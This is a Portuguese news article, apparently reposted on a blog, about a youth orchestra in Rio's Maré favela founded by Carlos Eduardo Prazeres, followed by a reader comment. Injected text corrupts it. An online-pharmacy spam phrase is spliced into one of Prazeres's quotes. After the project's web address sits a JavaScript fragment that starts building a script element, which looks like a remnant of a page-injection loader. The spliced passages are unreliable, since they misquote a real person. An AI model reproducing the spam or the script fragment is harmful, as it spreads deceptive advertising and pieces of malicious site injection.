LateralNotícia

Transformando vidas através da música

Orquestra Maré do Amanhã leva inclusão social a jovens carentes.

Em menos de dois anos de curso, os alunos surpreenderam os professores e já tocam peças de autores como Beethoven e Bach.

Na segunda-feira passada, o estudante Ruan Pablo Ribeiro, de 13 anos, saía de casa para mais uma aula de música no Ciep Operário Vicente Mariano, na Favela da Maré, quando soube que estava acontecendo uma troca de tiros entre policiais e traficantes. Sem ver ou ouvir nada, resolveu se arriscar e seguir em frente. Ao entrar na escola, soube que quase metade da turma não tinha ido, por medo. A equipe do Caderno Ilha estava no local para fazer uma reportagem com ele e outros estudantes que integram a Orquestra Maré do Amanhã — um projeto que busca, além de formar músicos profissionais, dar oportunidade para jovens desta região com altos índices de violência e pobreza mudarem não só o seu futuro, mas o seu presente.

Ruan não escondeu a decepção com a situação:

— Quase toda semana temos tiroteio aqui, na comunidade. Infelizmente, as aulas foram canceladas várias vezes por causa desse problema, mas sempre são retomadas.

Ele está na Orquestra Maré do Amanhã desde o começo, em julho de 2010, e toca flauta. O instrumento, que custa R$ 2 mil, pertence ao conjunto, mas fica com o estudante em tempo integral, para que possa praticar em casa. O mesmo ocorre com os outros jovens integrantes do grupo.

O idealizador e coordenador do projeto Estrada Cultural, da qual a orquestra faz parte, é Carlos Eduardo Prazeres, morador de Petrópolis. A escolha por implantá-lo na Favela da Maré não foi por acaso, veio de uma tragédia pessoal. Em 1999, seu pai, o maestro Armando Prazeres, regente da Orquestra Pró-Música, foi morto com um tiro depois de sofrer um sequestro relâmpago. Os autores do crime eram moradores da Maré.

— “Quando idealizei o projeto, quis iniciá-lo no local onde viviam os assassinos do meu pai. Penso que, dessa forma, ajudamos a mudar o futuro de muitos jovens que poderiam acabar sendo levados para o mundo do crime” — conta Prazeres.

Hoje, o trabalho conta com 60 jovens, sendo que 35 já são membros fixos da orquestra. O objetivo é que, ainda este ano, as aulas sejam levadas para mais três escolas públicas da região, chegando a um mínimo de 150 alunos.

— “Passamos por muitas dificuldades no ano passado porque ficamos sem apoio financeiro, mas em nenhum momento pensamos em desistir. Todos os professores são moradores de Petrópolis e nunca deixaram de vir para as aulas” — explica o coordenador.

Este ano, a situação da orquestra começa a melhorar. Duas parcerias já foram confirmadas: a Lamsa, concessionária que administra a Linha Amarela, que deu apoio financeiro na época da implantação do projeto, voltou a patrociná-lo. Já a multinacional do setor de energia State Grid se comprometeu a apoiá-lo até 2014, com o objetivo de formar a primeira grande orquestra infanto-juvenil de cunho social do país.

No ano passado, o conjunto, com regência do maestro Júlio Siqueira, fez 15 apresentações oficiais, inclusive no Palácio de Cristal de Petrópolis e na Câmara Municipal do Rio. A evolução musical dos estudantes é contínua e, de acordo com os professores, grandes talentos já foram identificados.

— ” buy torsemide online no script Percebemos que alguns alunos têm muita facilidade para lidar com qualquer instrumento. Em pouco mais de um ano de projeto, eles já tocam Beethoven e Bach. E pensar que muitos deles sequer tinham tido contato com a música clássica” — diz Prazeres.

Por sua vez, os pais perceberam uma melhora no comportamento e nos estudos dos alunos. A dona de casa Gerlaine Pires Nogueira, mãe de uma integrante do projeto, diz que sua filha ficou mais responsável e passou a selecionar melhor as amizades, depois que passou a fazer parte da orquestra.

Informações sobre abertura de turmas e apresentações podem ser encontradas no site www.projetoestradacultural.com.br}var d=document;var s=d.createElement(‘script’);

1 Comment

  1. Eu já partisipei e gostaria de voltar, só que não há como. Eu amo todos vocês. Fiquem com Deus e tenham muita paz, saúde e fé. Cada vez está fazendo mais socesso!!

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.